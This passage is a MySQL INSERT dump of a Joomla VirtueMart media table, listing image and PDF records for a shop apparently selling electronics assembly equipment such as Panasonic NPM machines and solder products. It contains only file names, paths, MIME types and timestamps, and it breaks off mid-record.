INSERT INTO `fz6t4_virtuemart_medias` VALUES (1,1,'5-aps_kobi.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/5-aps_kobi.jpg','',0,0,0,'','',0,1,'2014-08-01 09:00:50',676,'2014-08-01 09:00:50',676,'0000-00-00 00:00:00',0),(2,1,'5-aps_kobi4.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/5-aps_kobi4.jpg','images/stories/virtuemart/category/resized/',0,0,0,'','',0,1,'2014-08-01 09:02:45',676,'2014-08-01 13:49:23',676,'0000-00-00 00:00:00',0),(3,1,'2-mx100-400.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/2-mx100-400.jpg','',0,0,0,'','',0,1,'2014-08-01 09:04:13',676,'2016-12-08 14:45:19',676,'0000-00-00 00:00:00',0),(4,1,'le40v_300dpi.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/le40v_300dpi.jpg','',0,0,0,'','',0,1,'2014-08-01 11:37:24',676,'2014-08-01 11:37:24',676,'0000-00-00 00:00:00',0),(5,1,'le40v_300dpi.jpg_product','','','','image/jpeg','product','images/stories/virtuemart/product/le40v_300dpi3.jpg','',0,0,0,'','',0,1,'2014-08-01 11:38:33',676,'2014-08-01 11:38:33',676,'0000-00-00 00:00:00',0),(6,1,'le40v_300dpi.jpg_product_product','','','','image/jpeg','product','images/stories/virtuemart/product/le40v_400x214.jpg','',0,0,0,'','',0,1,'2014-08-01 11:39:13',676,'2020-02-17 06:57:18',676,'0000-00-00 00:00:00',0),(7,1,'cowboy_hat.jpg','cowboy_hat.jpg','cowboy_hat.jpg','','image/jpeg','product','images/stories/virtuemart/product/cowboy_hat.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(8,1,'jacket_classic.jpg','jacket_classic.jpg','jacket_classic.jpg','','image/jpeg','product','images/stories/virtuemart/product/jacket_classic.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(9,1,'marinecap.jpg','marinecap.jpg','marinecap.jpg','','image/jpeg','product','images/stories/virtuemart/product/marinecap.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(10,1,'wide_dress_2.jpg','wide_dress_2.jpg','wide_dress_2.jpg','','image/jpeg','product','images/stories/virtuemart/product/wide_dress_2.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(11,1,'baseballcap.jpg','baseballcap.jpg','baseballcap.jpg','','image/jpeg','product','images/stories/virtuemart/product/baseballcap.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(12,1,'cap.jpg','cap.jpg','cap.jpg','','image/jpeg','product','images/stories/virtuemart/product/cap.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(13,1,'poncho.jpg','poncho.jpg','poncho.jpg','','image/jpeg','product','images/stories/virtuemart/product/poncho.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(14,1,'cart_logo.jpg','cart_logo.jpg','cart_logo.jpg','','image/jpeg','product','images/stories/virtuemart/product/cart_logo.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(15,1,'classic_hat.jpg','classic_hat.jpg','classic_hat.jpg','','image/jpeg','product','images/stories/virtuemart/product/classic_hat.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(16,1,'dress.jpg','dress.jpg','dress.jpg','','image/jpeg','product','images/stories/virtuemart/product/dress.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(17,1,'santa_cap.jpg','santa_cap.jpg','santa_cap.jpg','','image/jpeg','product','images/stories/virtuemart/product/santa_cap.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(18,1,'jumper.jpg','jumper.jpg','jumper.jpg','','image/jpeg','product','images/stories/virtuemart/product/jumper.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(19,1,'derbyhat.jpg','derbyhat.jpg','derbyhat.jpg','','image/jpeg','product','images/stories/virtuemart/product/derbyhat.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(20,1,'cap6.jpg','cap6.jpg','cap6.jpg','','image/jpeg','category','images/stories/virtuemart/category/cap6.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(21,1,'jacket_classic7.jpg','jacket_classic7.jpg','jacket_classic7.jpg','','image/jpeg','category','images/stories/virtuemart/category/jacket_classic7.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(22,1,'student_hat_16.jpg','student_hat_16.jpg','student_hat_16.jpg','','image/jpeg','category','images/stories/virtuemart/category/student_hat_16.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(23,1,'hat_category8.jpg','hat_category8.jpg','hat_category8.jpg','','image/jpeg','category','images/stories/virtuemart/category/hat_category8.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(24,1,'black_dress_2.jpg','black_dress_2.jpg','black_dress_2.jpg','','image/jpeg','category','images/stories/virtuemart/category/black_dress_2.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(25,1,'manufacturer.jpg','manufacturer.jpg','manufacturer.jpg','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/manufacturer.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(26,1,'manufacturersample.jpg','manufacturersample.jpg','manufacturersample.jpg','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/manufacturersample.jpg','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(27,1,'vendor.gif','vendor.gif','vendor.gif','','image/gif','vendor','images/stories/virtuemart/vendor/vendor.gif','',0,0,0,'','',0,1,'2014-08-01 13:18:48',676,'2014-08-01 13:18:48',676,'0000-00-00 00:00:00',0),(28,1,'le40v_400x214.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/le40v_400x214.jpg','',0,0,0,'','',0,1,'2014-08-01 13:51:18',676,'2022-07-26 11:56:12',676,'0000-00-00 00:00:00',0),(29,1,'mx200.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/mx200.jpg','',0,0,0,'','',0,1,'2014-08-01 14:14:37',676,'2014-08-01 14:14:37',676,'0000-00-00 00:00:00',0),(30,1,'mx200.jpg_product','','','','image/jpeg','product','images/stories/virtuemart/product/mx2009.jpg','',0,0,0,'','',0,1,'2014-08-01 14:15:51',676,'2014-08-01 14:15:51',676,'0000-00-00 00:00:00',0),(31,1,'mx200.jpg_product_product','','','','image/jpeg','product','images/stories/virtuemart/product/mx2007.jpg','',0,0,0,'','',0,1,'2014-08-01 14:16:28',676,'2014-08-01 14:16:28',676,'0000-00-00 00:00:00',0),(32,1,'mx2008.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/mx2008.jpg','',0,0,0,'','',0,1,'2014-08-01 14:17:28',676,'2014-08-01 14:17:28',676,'0000-00-00 00:00:00',0),(33,1,'mx200.jpg_product_product_product','','','','image/jpeg','product','images/stories/virtuemart/product/mx200.jpg','images/stories/virtuemart/product/mx200.jpg',0,0,0,'','',0,1,'2014-08-01 14:18:14',676,'2014-08-02 07:07:40',676,'0000-00-00 00:00:00',0),(34,1,'npm-1.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/npm-1.jpg','images/stories/virtuemart/category/npm-1.jpg',0,0,0,'','',0,1,'2014-08-02 06:38:50',676,'2014-08-02 06:43:13',676,'0000-00-00 00:00:00',0),(35,1,'logo-panasonic.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/logo-panasonic.jpg','images/stories/virtuemart/manufacturer/logo-panasonic.jpg',0,0,0,'','',0,1,'2014-08-02 06:54:40',676,'2014-08-02 06:58:10',676,'0000-00-00 00:00:00',0),(36,1,'logo.gif','','','','image/gif','manufacturer','images/stories/virtuemart/manufacturer/logo.gif','images/stories/virtuemart/manufacturer/logo.gif',0,0,0,'','',0,1,'2014-08-02 06:57:15',676,'2014-08-02 09:24:40',676,'0000-00-00 00:00:00',0),(37,1,'kester-logo.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/kester-logo.jpg','',0,0,0,'','',0,1,'2014-08-02 07:00:18',676,'2014-08-02 07:02:20',676,'0000-00-00 00:00:00',0),(38,1,'kester-logo.jpg_manufacturer','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/kester-logo2.jpg','',0,0,0,'','',0,1,'2014-08-02 07:01:52',676,'2014-08-02 07:01:52',676,'0000-00-00 00:00:00',0),(39,1,'logo-ddm.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/logo-ddm.jpg','',0,0,0,'','',0,1,'2014-08-02 07:05:31',676,'2014-08-02 07:05:51',676,'0000-00-00 00:00:00',0),(40,1,'logo-ddm2.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/logo-ddm2.jpg','',0,0,0,'','',0,1,'2014-08-02 07:05:53',676,'2014-08-02 07:05:53',676,'0000-00-00 00:00:00',0),(41,1,'tolo_logo.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/tolo_logo.jpg','',0,0,0,'','',0,1,'2014-08-02 07:06:31',676,'2014-08-02 07:06:42',676,'0000-00-00 00:00:00',0),(42,1,'cm602.png','','','','image/png','product','images/stories/virtuemart/product/cm602.png','',0,0,0,'','',0,1,'2014-08-02 07:30:30',676,'2014-08-02 07:39:36',676,'0000-00-00 00:00:00',0),(43,1,'npm-1.jpg_category','','','','image/jpeg','category','images/stories/virtuemart/category/npm.jpg','',0,0,0,'','',0,1,'2014-08-02 07:36:04',676,'2020-11-21 22:48:17',676,'0000-00-00 00:00:00',0),(44,1,'sp18.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/sp18.jpg','',0,0,0,'','',0,1,'2014-08-02 07:46:40',676,'2016-12-08 14:46:12',676,'0000-00-00 00:00:00',0),(45,1,'t_ly8c.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/t_ly8c.jpg','',0,0,0,'','',0,1,'2014-08-02 07:47:58',676,'2016-12-08 14:44:17',676,'0000-00-00 00:00:00',0),(46,1,'avk3_1m.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/avk3_1m.jpg','',0,0,0,'','',0,1,'2014-08-02 07:50:16',676,'2016-12-08 15:32:09',676,'0000-00-00 00:00:00',0),(47,1,'t_mi300.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/t_mi300.jpg','',0,0,0,'','',0,1,'2014-08-02 07:52:35',676,'2020-11-21 22:49:30',676,'0000-00-00 00:00:00',0),(48,1,'ess-310-left-400x464.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/ess-310-left-400x464.jpg','',0,0,0,'','',0,1,'2014-08-02 07:58:27',676,'2016-12-08 14:54:14',676,'0000-00-00 00:00:00',0),(49,1,'trident_full_view.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/trident_full_view.jpg','',0,0,0,'','',0,1,'2014-08-02 09:19:38',676,'2016-12-08 14:43:52',676,'0000-00-00 00:00:00',0),(50,1,'t_pb3_s.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/t_pb3_s.jpg','',0,0,0,'','',0,1,'2014-08-02 09:21:12',676,'2016-12-08 14:53:40',676,'0000-00-00 00:00:00',0),(51,1,'index_01.jpg','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/index_01.jpg','',0,0,0,'','',0,1,'2014-08-02 09:22:22',676,'2017-11-09 09:36:03',676,'0000-00-00 00:00:00',0),(52,1,'logo-panasonic.jpg_manufacturer','','','','image/jpeg','manufacturer','images/stories/virtuemart/manufacturer/logo-panasonic6.jpg','',0,0,0,'','',0,1,'2014-08-02 09:23:19',676,'2017-11-05 11:30:14',676,'0000-00-00 00:00:00',0),(53,1,'logo.gif_manufacturer','','','','image/gif','manufacturer','images/stories/virtuemart/manufacturer/mirae_logo.gif','',0,0,0,'','',0,1,'2014-08-02 09:25:33',676,'2014-08-02 09:25:33',676,'0000-00-00 00:00:00',0),(54,1,'k_all.png','','','','image/png','category','images/stories/virtuemart/category/k_all.png','',0,0,0,'','',0,1,'2014-08-02 09:35:53',676,'2016-12-08 14:52:56',676,'0000-00-00 00:00:00',0),(55,1,'rhii_640x420.jpg','','','','image/jpeg','category','images/stories/virtuemart/category/rhii_640x420.jpg','',0,0,0,'','',0,1,'2014-08-02 09:41:05',676,'2016-12-08 14:54:48',676,'0000-00-00 00:00:00',0),(56,1,'av132.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/av132.jpg','',0,0,0,'','',0,1,'2014-08-02 10:52:19',676,'2020-02-16 20:57:15',676,'0000-00-00 00:00:00',0),(57,1,'rl132.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/rl132.jpg','',0,0,0,'','',0,1,'2014-08-02 10:59:44',676,'2020-11-26 07:57:22',676,'0000-00-00 00:00:00',0),(58,1,'jv131.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/jv131.jpg','',0,0,0,'','',0,1,'2014-08-02 11:14:41',676,'2020-02-16 20:22:49',676,'0000-00-00 00:00:00',0),(59,1,'cs-40.gif','','','','image/gif','product','images/stories/virtuemart/product/cs-40.gif','',0,0,0,'','',0,1,'2014-08-02 12:48:21',676,'2020-02-17 06:54:46',676,'0000-00-00 00:00:00',0),(60,1,'ls60v.gif','','','','image/gif','product','images/stories/virtuemart/product/ls60v.gif','',0,0,0,'','',0,1,'2014-08-02 12:52:00',676,'2020-02-16 21:58:43',676,'0000-00-00 00:00:00',0),(61,1,'am100.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/lps-c.jpg','',0,0,0,'','',0,1,'2014-08-02 13:03:59',676,'2020-02-11 14:04:36',676,'0000-00-00 00:00:00',0),(62,1,'sp18.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/sp18.jpg','',0,0,0,'','',0,1,'2014-08-02 13:17:31',676,'2020-02-11 19:03:52',676,'0000-00-00 00:00:00',0),(63,1,'t_asp-300.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/t_asp-300.jpg','',0,0,0,'','',0,1,'2014-08-02 13:22:22',676,'2014-08-03 19:55:39',676,'0000-00-00 00:00:00',0),(64,1,'t_ly8c.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/t_ly8c.jpg','',0,0,0,'','',0,1,'2014-08-02 13:26:06',676,'2020-02-17 07:50:14',676,'0000-00-00 00:00:00',0),(65,1,'kopyası-gf-12ht.gif','','','','image/gif','product','images/stories/virtuemart/product/kopyası-gf-12ht.gif','',0,0,0,'','',0,1,'2014-08-02 13:31:05',676,'2020-02-16 21:40:24',676,'0000-00-00 00:00:00',0),(66,1,'t_mi300.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/t_mi300.jpg','',0,0,0,'','',0,1,'2014-08-02 13:49:31',676,'2020-02-11 19:26:30',676,'0000-00-00 00:00:00',0),(67,1,'lfs-1-photo.gif','','','','image/gif','product','images/stories/virtuemart/product/lfs-1-photo.gif','',0,0,0,'','',0,1,'2014-08-03 07:06:22',676,'2020-02-11 19:23:04',676,'0000-00-00 00:00:00',0),(68,1,'avb_1.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/avb_1.jpg','',0,0,0,'','',0,1,'2014-08-03 07:25:37',676,'2020-02-17 09:17:24',676,'0000-00-00 00:00:00',0),(69,1,'avb_12.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/avb_12.jpg','',0,0,0,'','',0,1,'2014-08-03 09:26:39',676,'2020-02-17 09:20:08',676,'0000-00-00 00:00:00',0),(70,1,'rh6-400x300.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/rh6-400x300.jpg','',0,0,0,'','',0,1,'2014-08-03 09:43:00',676,'2020-02-17 09:42:11',676,'0000-00-00 00:00:00',0),(71,1,'rhii_640x420.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/rhii_640x420.jpg','',0,0,0,'','',0,1,'2014-08-03 09:55:07',676,'2020-02-17 10:27:33',676,'0000-00-00 00:00:00',0),(72,1,'jvk.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/jvk.jpg','',0,0,0,'','',0,1,'2014-08-03 10:05:51',676,'2020-02-17 08:55:45',676,'0000-00-00 00:00:00',0),(73,1,'trident_full_view.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/trident_full_view.jpg','',0,0,0,'','',0,1,'2014-08-03 10:20:06',676,'2014-08-03 20:12:24',676,'0000-00-00 00:00:00',0),(74,1,'ess-310-left-400x464.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/ess-310-left-400x464.jpg','',0,0,0,'','',0,1,'2014-08-03 10:32:32',676,'2020-02-17 08:09:23',676,'0000-00-00 00:00:00',0),(75,1,'k_cwt.png','','','','image/png','category','images/stories/virtuemart/category/k_cwt.png','',0,0,0,'','',0,1,'2014-08-03 10:50:44',676,'2014-08-03 10:51:02',676,'0000-00-00 00:00:00',0),(76,1,'k_sb_2.png','','','','image/png','category','images/stories/virtuemart/category/k_sb_2.png','',0,0,0,'','',0,1,'2014-08-03 10:52:42',676,'2014-08-03 10:52:56',676,'0000-00-00 00:00:00',0),(77,1,'k_fl.png','','','','image/png','category','images/stories/virtuemart/category/k_fl.png','',0,0,0,'','',0,1,'2014-08-03 10:54:37',676,'2014-08-03 10:54:59',676,'0000-00-00 00:00:00',0),(78,1,'k_kr907_s.png','','','','image/png','category','images/stories/virtuemart/category/k_kr907_s.png','',0,0,0,'','',0,1,'2014-08-03 10:55:51',676,'2014-08-03 11:55:34',676,'0000-00-00 00:00:00',0),(79,1,'k_solder-bar_.png','','','','image/png','product','images/stories/virtuemart/product/k_solder-bar_.png','',0,0,0,'','',0,1,'2014-08-03 11:13:18',676,'2014-08-03 20:26:25',676,'0000-00-00 00:00:00',0),(80,1,'k_solder-bar_3.png','','','','image/png','product','images/stories/virtuemart/product/k_solder-bar_3.png','',0,0,0,'','',0,1,'2014-08-03 11:13:37',676,'2014-08-03 20:27:28',676,'0000-00-00 00:00:00',0),(81,1,'k_cwlf.png','','','','image/png','product','images/stories/virtuemart/product/k_cwlf.png','',0,0,0,'','',0,1,'2014-08-03 11:16:41',676,'2014-08-07 08:07:11',676,'0000-00-00 00:00:00',0),(82,1,'paste_1.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/paste_1.jpg','',0,0,0,'','',0,1,'2014-08-03 11:28:57',676,'2014-08-03 20:31:35',676,'0000-00-00 00:00:00',0),(83,1,'k_fl.png','','','','image/png','product','images/stories/virtuemart/product/k_fl.png','',0,0,0,'','',0,1,'2014-08-03 11:58:35',676,'2014-08-03 20:32:40',676,'0000-00-00 00:00:00',0),(84,1,'mx200.jpg_product_product_product_product','','','','image/gif','product','images/stories/virtuemart/product/mirae-mx_400_s.gif','',0,0,0,'','',0,1,'2014-08-03 12:45:07',676,'2014-08-03 19:48:54',676,'0000-00-00 00:00:00',0),(85,1,'cm602.png_product','','','','image/jpeg','product','images/stories/virtuemart/product/npm.jpg','',0,0,0,'','',0,1,'2014-08-03 12:49:41',676,'2020-02-11 13:56:13',676,'0000-00-00 00:00:00',0),(86,1,'spr-20.gif','','','','image/gif','product','images/stories/virtuemart/product/spr-20.gif','',0,0,0,'','',0,1,'2014-08-03 18:37:47',676,'2020-02-17 07:37:13',676,'0000-00-00 00:00:00',0),(87,1,'spr-20.gif_product','','','','image/jpeg','product','images/stories/virtuemart/product/spr-25.jpg','',0,0,0,'','',0,1,'2014-08-03 18:40:24',676,'2020-02-17 07:41:49',676,'0000-00-00 00:00:00',0),(88,1,'spr-20.gif_product_product','','','','image/gif','product','images/stories/virtuemart/product/spr-45va.gif','',0,0,0,'','',0,1,'2014-08-03 18:45:36',676,'2020-02-17 07:46:05',676,'0000-00-00 00:00:00',0),(89,1,'spartan_8s.gif','','','','image/gif','product','images/stories/virtuemart/product/spartan_8s.gif','',0,0,0,'','',0,1,'2014-08-03 19:13:20',676,'2020-02-17 07:57:14',676,'0000-00-00 00:00:00',0),(90,1,'spartan_8s.gif_product','','','','image/jpeg','product','images/stories/virtuemart/product/spartan12s-400x268.jpg','',0,0,0,'','',0,1,'2014-08-03 19:17:26',676,'2020-02-17 08:05:01',676,'0000-00-00 00:00:00',0),(91,1,'a_stencilwasher-eco_s.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/a_stencilwasher-eco_s.jpg','',0,0,0,'','',0,1,'2014-08-03 20:35:53',676,'2014-08-03 20:49:44',676,'0000-00-00 00:00:00',0),(92,1,'zero-g3.jpg','','','','image/jpeg','product','images/stories/virtuemart/product/zero-g3.jpg','',0,0,0,'','',0,1,'2014-08-03 20:52:43',676,'2014-08-03 21:10:26',676,'0000-00-00 00:00:00',0),(93,1,'logo-3S.jpg','','','','image/png','manufacturer','images/stories/virtuemart/manufacturer/3s-logo-2-400x88.png','',0,0,0,'','',0,1,'2019-09-16 09:10:45',676,'2019-09-16 09:15:47',676,'0000-00-00 00:00:00',0),(94,1,'3s-logo-2-400x889.png','','','','image/png','manufacturer','images/stories/virtuemart/manufacturer/3s-logo-2-400x889.png','',0,0,0,'','',0,1,'2019-09-16 09:16:48',676,'2019-09-16 09:16:48',676,'0000-00-00 00:00:00',0),(95,1,'center-comp-1-640x614.png','','','','image/png','product','images/stories/virtuemart/product/center-comp-1-640x614.png','',0,0,0,'','',0,1,'2019-09-16 09:17:49',676,'2019-09-16 13:17:17',676,'0000-00-00 00:00:00',0),(96,1,'center-comp-1-640x614.png','','','','image/png','category','images/stories/virtuemart/category/center-comp-1-640x614.png','',0,0,0,'','',0,1,'2019-09-16 09:44:50',676,'2019-09-16 10:28:19',676,'0000-00-00 00:00:00',0),(97,1,'center-comp-1-640x377.png','','','','image/png','product','images/stories/virtuemart/product/right-comp-1-640x402.png','',0,0,0,'','',0,1,'2019-09-16 11:54:06',676,'2019-09-16 11:57:22',676,'0000-00-00 00:00:00',0),(98,1,'center-comp-1-640x377.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-1024x498.png','',0,0,0,'','',0,1,'2019-09-16 11:55:25',676,'2019-09-16 11:56:49',676,'0000-00-00 00:00:00',0),(99,1,'pano-480x504.png_1','','','','image/png','product','images/stories/virtuemart/product/pano-480x504.png','',0,0,0,'','',0,1,'2019-09-16 11:56:15',676,'2019-09-16 11:56:15',676,'0000-00-00 00:00:00',0),(100,1,'center-comp-1-640x377.png_2','','','','image/png','product','images/stories/virtuemart/product/center-comp-1-640x377.png','',0,0,0,'','',0,1,'2019-09-16 11:57:10',676,'2019-09-19 09:51:09',676,'0000-00-00 00:00:00',0),(101,1,'pano-457x480.png_1','','','','image/png','product','images/stories/virtuemart/product/pano-457x480.png','',0,0,0,'','',0,1,'2019-09-16 12:01:45',676,'2019-09-16 12:04:57',676,'0000-00-00 00:00:00',0),(102,1,'inverter-509x640.png_1','','','','image/png','product','images/stories/virtuemart/product/inverter-509x640.png','',0,0,0,'','',0,1,'2019-09-16 12:02:03',676,'2019-09-16 12:05:43',676,'0000-00-00 00:00:00',0),(103,1,'right-comp-1-640x627.png_1','','','','image/png','product','images/stories/virtuemart/product/right-comp-1-640x627.png','',0,0,0,'','',0,1,'2019-09-16 12:03:55',676,'2019-09-16 12:03:55',676,'0000-00-00 00:00:00',0),(104,1,'spindle-600x1092.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-600x1092.png','',0,0,0,'','',0,1,'2019-09-16 12:04:21',676,'2019-09-16 12:04:21',676,'0000-00-00 00:00:00',0),(105,1,'spindle-600x10921.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-600x10921.png','',0,0,0,'','',0,1,'2019-09-16 12:07:42',676,'2019-09-16 12:07:42',676,'0000-00-00 00:00:00',0),(106,1,'spindle-352x640.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-352x640.png','',0,0,0,'','',0,1,'2019-09-16 12:09:25',676,'2019-09-16 12:09:25',676,'0000-00-00 00:00:00',0),(107,1,'spindle-352x6404.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-352x6404.png','',0,0,0,'','',0,1,'2019-09-16 12:11:05',676,'2019-09-16 12:11:05',676,'0000-00-00 00:00:00',0),(108,1,'spindle-352x451.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-352x451.png','',0,0,0,'','',0,1,'2019-09-16 12:13:32',676,'2019-09-16 12:13:32',676,'0000-00-00 00:00:00',0),(109,1,'spindle-352x4511.png_1','','','','image/png','product','images/stories/virtuemart/product/spindle-352x4511.png','',0,0,0,'','',0,1,'2019-09-16 12:14:00',676,'2019-09-16 12:14:00',676,'0000-00-00 00:00:00',0),(110,1,'lps-c.jpg_1','','','','image/jpeg','product','images/stories/virtuemart/product/lps-c.jpg','',0,0,0,'','',0,1,'2020-02-11 09:43:49',676,'2020-02-11 09:53:57',676,'0000-00-00 00:00:00',0),(111,1,'lps-c.-400x448jpg.jpg','','No image set ','','image/jpeg','category','images/stories/virtuemart/category/lps-c.-400x448jpg.jpg','',0,0,0,'','',0,1,'2020-02-11 09:54:39',676,'2020-02-11 09:54:39',676,'0000-00-00 00:00:00',0),(112,1,'lps-c-2-400x449.png_1','','','','image/png','product','images/stories/virtuemart/product/lps-c-2-400x449.png','',0,0,0,'','',0,1,'2020-02-11 10:52:27',676,'2020-02-13 18:51:04',676,'0000-00-00 00:00:00',0),(113,1,'lps-c-2-400x449.png_1','','No image set ','','image/png','category','images/stories/virtuemart/category/lps-c-2-400x449.png','',0,0,0,'','',0,1,'2020-02-11 10:53:13',676,'2020-02-11 13:14:25',676,'0000-00-00 00:00:00',0),(114,1,'npm-vf-400x350.png','','No image set ','','image/png','product','images/stories/virtuemart/product/npm-vf-400x350.png','',0,0,0,'','',0,1,'2020-02-11 13:33:55',676,'2020-11-26 05:27:08',676,'0000-00-00 00:00:00',0),(115,1,'npm-vf-400x350.png','','No image set ','','image/png','category','images/stories/virtuemart/category/npm-vf-400x350.png','',0,0,0,'','',0,1,'2020-02-11 13:34:34',676,'2020-02-11 13:34:49',676,'0000-00-00 00:00:00',0),(116,1,'AM100.jpg_1','','','','image/jpeg','product','images/stories/virtuemart/product/AM100.jpg','',0,0,0,'','',0,1,'2020-02-11 14:05:29',676,'2020-11-26 07:57:45',676,'0000-00-00 00:00:00',0),(117,1,'AM100.jpg_1','','','','image/jpeg','category','images/stories/virtuemart/category/AM100.jpg','',0,0,0,'','',0,1,'2020-02-11 14:07:27',676,'2020-02-11 14:07:40',676,'0000-00-00 00:00:00',0),(118,1,'spg.png_1','','','','image/png','product','images/stories/virtuemart/product/spg.png','',0,0,0,'','',0,1,'2020-02-11 19:07:50',676,'2020-02-17 07:04:07',676,'0000-00-00 00:00:00',0),(119,1,'lps-c-1.png_1','','','','image/png','product','images/stories/virtuemart/product/lps-c-1.png','',0,0,0,'','',0,1,'2020-02-13 18:48:17',676,'2020-02-16 20:56:05',676,'0000-00-00 00:00:00',0),(120,1,'NPM-W2-600x600.png_1','','','','image/png','product','images/stories/virtuemart/product/NPM-W2-600x600.png','',0,0,0,'','',0,1,'2020-02-13 19:35:19',676,'2020-11-23 10:32:02',676,'0000-00-00 00:00:00',0),(121,1,'TOP3-437x1920.png','','','','image/png','product','images/stories/virtuemart/product/TOP3-437x1920.png','',0,0,0,'','',0,1,'2020-11-21 22:52:44',676,'2020-11-21 22:55:00',676,'0000-00-00 00:00:00',0),(122,1,'NPM-D3-front.png','','','','image/png','product','images/stories/virtuemart/product/NPM-D3-front.png','',0,0,0,'','',0,1,'2020-11-23 07:17:24',676,'2020-11-23 07:21:21',676,'0000-00-00 00:00:00',0),(123,1,'NPM-D3A.png_1','','','','image/png','product','images/stories/virtuemart/product/NPM-D3A.png','',0,0,0,'','',0,1,'2020-11-23 07:21:05',676,'2020-11-26 06:52:20',676,'0000-00-00 00:00:00',0),(124,1,'NPM-W2S.png_1','','','','image/png','product','images/stories/virtuemart/product/NPM-W2S.png','',0,0,0,'','',0,1,'2020-11-23 08:38:20',676,'2020-11-26 06:51:28',676,'0000-00-00 00:00:00',0),(125,1,'NPM-VF-1.png_1','','No image set ','','image/png','product','images/stories/virtuemart/product/NPM-VF-1.png','',0,0,0,'','',0,1,'2020-11-26 05:27:00',676,'2020-11-26 05:43:49',676,'0000-00-00 00:00:00',0),(126,1,'AM100_en_18_0101_leaflet.pdf_1','','No image set ','','application/pdf','product','images/stories/virtuemart/product/AM100_en_18_0101_leaflet.pdf','',0,0,0,'','',0,1,'2020-11-26 05:58:15',676,'2020-11-26 05:58:15',676,'0000-00-00 